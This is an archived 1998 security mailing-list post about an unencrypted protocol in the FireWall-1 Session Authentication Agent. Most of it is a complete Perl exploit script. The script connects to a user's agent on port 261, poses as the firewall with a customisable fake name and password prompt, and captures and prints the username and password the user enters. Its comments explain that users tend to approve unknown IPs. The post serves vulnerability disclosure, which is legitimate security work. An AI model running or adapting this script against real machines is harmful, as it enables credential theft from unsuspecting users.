fw-1.lpsnoop.pl

`Date: Fri, 25 Sep 1998 18:24:58 -0400  
From: Andrew Danforth <[email protected]>  
Subject: Re: Firewall-1 3.0b Session Agent  
  
On Fri, 25 Sep 1998, Brooke Paul wrote:  
  
> > -----Original Message-----  
> > From: Larry Pingree [SMTP:[email protected]]  
> >  
> > A problem exists in the Firewall-1 3.0b Session Agent  
> >  
> > All communications from the Firewall-1 Module to the session agent are  
> > non-encrypted. Thus also allowing these communication to be snooped for  
> > usernames and passwords.  
>  
> I think it's worth noting that Checkpoint states that the included  
> Session Agent is a 'demo' and not officially supported. The real problem  
> is the protocol they have defined. Even if you attempt to write a secure  
> version it wouldn't interoperate with the firewall.  
  
Where is that stated? I was unable to find any documentation stating that  
the Authentication Agent is a demo. I'd be surprised if they advertised  
Session Auth as a feature yet claimed that their Agent wasn't supported...  
  
Here's the script that Larry referred to. I whipped it up during his FW-1  
class, of all places... :)  
  
---------- SNIP ----------  
#!/usr/bin/perl -w  
#  
# This script connects to a FireWall-1 Session Authentication Agent  
# running on Windows 95/NT. It attempts to "authenticate" the remote  
# user and returns the resulting username/password.  
#  
# The agent supports configuration of up to three IP addresses which  
# are allowed to submit authentication requests. If there are three  
# addresses configured, the user is presented with the following when  
# an unknown host connects:  
#  
# "Authentication request from this IP Address is not allowed."  
# [ OK ]  
#  
# If there are only one or two addresses allowed, the user gets this  
# nice little dialog box:  
#  
# "Do you want to enter this IP to the Firewall-1 list"  
# [ YES ] (default) [ NO ]  
#  
# Guess which button your typical user will click on?  
#  
# If the agent closes the connection prematurely, you will get strange  
# results.  
#  
# tested vs. FW-1 Authentication Agent 1.1  
#  
# Andrew Danforth <[email protected]>  
  
require 5.000;  
  
use Socket;  
use Getopt::Std;  
  
$| = 1;  
  
$FIREWALL_NAME = "Corporate Firewall";  
$PASSWORD_PROMPT = "FireWall-1 password";  
$PORT = 261;  
  
die unless getopts('n:p:');  
  
unless ($TARGET_IP = shift) {  
print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";  
exit(1);  
}  
  
$FIREWALL_NAME = $opt_n if (defined $opt_n);  
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);  
  
socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";  
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";  
  
select(SOCK); $| = 1; select(STDOUT);  
  
print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";  
print "sent greeting\n";  
print SOCK "331 User:\n\r";  
print "sent user request\n";  
$username = &get_response;  
print "username entered: $username\n";  
print SOCK "331 *$PASSWORD_PROMPT:\n\r";  
$password = &get_response;  
print "password entered: $password\n";  
print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";  
print SOCK "230 OK\n\r";  
  
sub get_response {  
# this is ugly but it works. the session agent doesn't seem to send proper newlines.  
my $input;  
$input .= $key while($key = getc SOCK and ord($key));  
return $input;  
}  
`